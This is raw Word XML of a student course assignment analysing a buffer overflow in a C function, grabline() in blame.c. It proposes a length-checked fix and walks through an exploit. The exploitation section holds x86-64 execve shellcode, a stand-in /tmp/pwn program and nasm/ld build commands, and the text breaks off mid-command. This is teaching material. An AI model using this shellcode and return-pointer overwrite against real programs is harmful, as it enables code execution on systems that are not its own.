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449" w:rsidRDefault="00077449" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00535194" w:rsidRDefault="00A04FC2" w:rsidP="00535194">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r>
        <w:t>CS 491 Assignment 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00535194"/>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00077449">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Spencer Baer | Isaiah Freeman | Kyle Galloway | Brad Wilson</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRDefault="00077449" w:rsidP="00077449">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00535194" w:rsidRPr="0099474D" w:rsidRDefault="00077449" w:rsidP="00077449">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099474D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">March </w:t>
      </w:r>
      <w:r w:rsidR="00A04FC2">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0099474D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>8, 2016</w:t>
      </w:r>
      <w:r w:rsidR="00535194" w:rsidRPr="0099474D">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00077449" w:rsidRPr="00535194" w:rsidRDefault="00077449" w:rsidP="00535194"/>
    <w:p w:rsidR="00872F4B" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Identif</w:t>
      </w:r>
      <w:r w:rsidR="00E70C89">
        <w:t>ication</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:r>
        <w:t xml:space="preserve">The vulnerability in </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04FC2">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>blame.c</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a buffer overflow vulnerability in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00A04FC2">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>grabline()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grabline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(char *s) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>while</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ((c=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">()) != EOF) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:firstLine="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">*s++ = c; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">*s = '\0'; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRPr="00A04FC2" w:rsidRDefault="00A04FC2" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984632" w:rsidRDefault="00984632" w:rsidP="00E70C89">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:r>
        <w:t xml:space="preserve">The while loop continues until an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>EOF</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> marker is returned from </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>getchar()</w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This allows an attacker to inject an arbitrarily long sequence of characters. The length of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scapegoat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buffer is 256 bytes, so any input longer than that will begin to overwrite the stack space above. Our exploit takes advantage of this overflow vulnerability to overwrite the return pointer of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>main()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> function and execute a malicious payload that uses an </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>execve()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call to run a program on the filesystem located at </w:t>
      </w:r>
      <w:r w:rsidRPr="00E70C89">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/tmp/pwn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:r>
        <w:t>To fix the buffer overflow exploit, limit the length of the input to the length of the buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>void</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grabline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(char *s, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>size_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> c;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E70C89" w:rsidRDefault="00E70C89" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>for(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>size_t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A26B92">
        <w:t xml:space="preserve"> = 1</w:t>
      </w:r>
      <w:r>
        <w:t>; (c=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getchar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">()) != EOF &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A26B92">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A26B92">
        <w:t>&lt; n; ++</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A26B92">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A26B92">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26B92" w:rsidRDefault="00A26B92" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>*s++ = c;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26B92" w:rsidRDefault="00A26B92" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t>*s ='\0';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A26B92" w:rsidRPr="00E70C89" w:rsidRDefault="00A26B92" w:rsidP="00E70C89">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRDefault="005502C2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A04FC2" w:rsidRDefault="00E70C89" w:rsidP="00A04FC2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Program</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRPr="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:r>
        <w:t xml:space="preserve">A proof-of-concept program is written that produces the desired output. The compiled program is saved to </w:t>
      </w:r>
      <w:r w:rsidRPr="005502C2">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>/tmp/pwn</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t>#include &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRPr="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> main(void) { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">("Now I </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> your computer\n"); }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRDefault="005502C2" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRPr="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:r>
        <w:t xml:space="preserve">An assembly program is written that executes a program located </w:t>
      </w:r>
      <w:r w:rsidR="001D6575">
        <w:t>at</w:t>
      </w:r>
      <w:r w:rsidRPr="005502C2">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp/pwn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>"/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", ["/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>"], NULL)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BA12C7" w:rsidRDefault="00BA12C7" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">; taken from: </w:t>
      </w:r>
      <w:r w:rsidR="00984632">
        <w:t>http://shell-storm.org/shellcode/files/shellcode-603.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>section</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> .text</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>global</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> _start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    _start:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>xor</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     qword </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, '/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>push</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rbx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>push</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rax</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>push</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rdi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rsp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     al, 0x3b</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRPr="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>syscall</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986"/>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Compile</w:t>
      </w:r>
      <w:r w:rsidR="005502C2">
        <w:t>, Link</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and Dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005502C2" w:rsidRPr="005502C2" w:rsidRDefault="005502C2" w:rsidP="005502C2">
      <w:r>
        <w:t xml:space="preserve">The program is compiled and linked. The resulting machine code will become a part of the payload injected into the </w:t>
      </w:r>
      <w:r w:rsidRPr="005502C2">
        <w:rPr>
          <w:rStyle w:val="CodeInlineChar"/>
        </w:rPr>
        <w:t>scapegoat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> buffer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>nasm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> –f elf64 payload.asm</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003D4986" w:rsidRDefault="003D4986" w:rsidP="003D4986">
      <w:pPr>
        <w:pStyle w:val="CodeBlock"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>ld</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
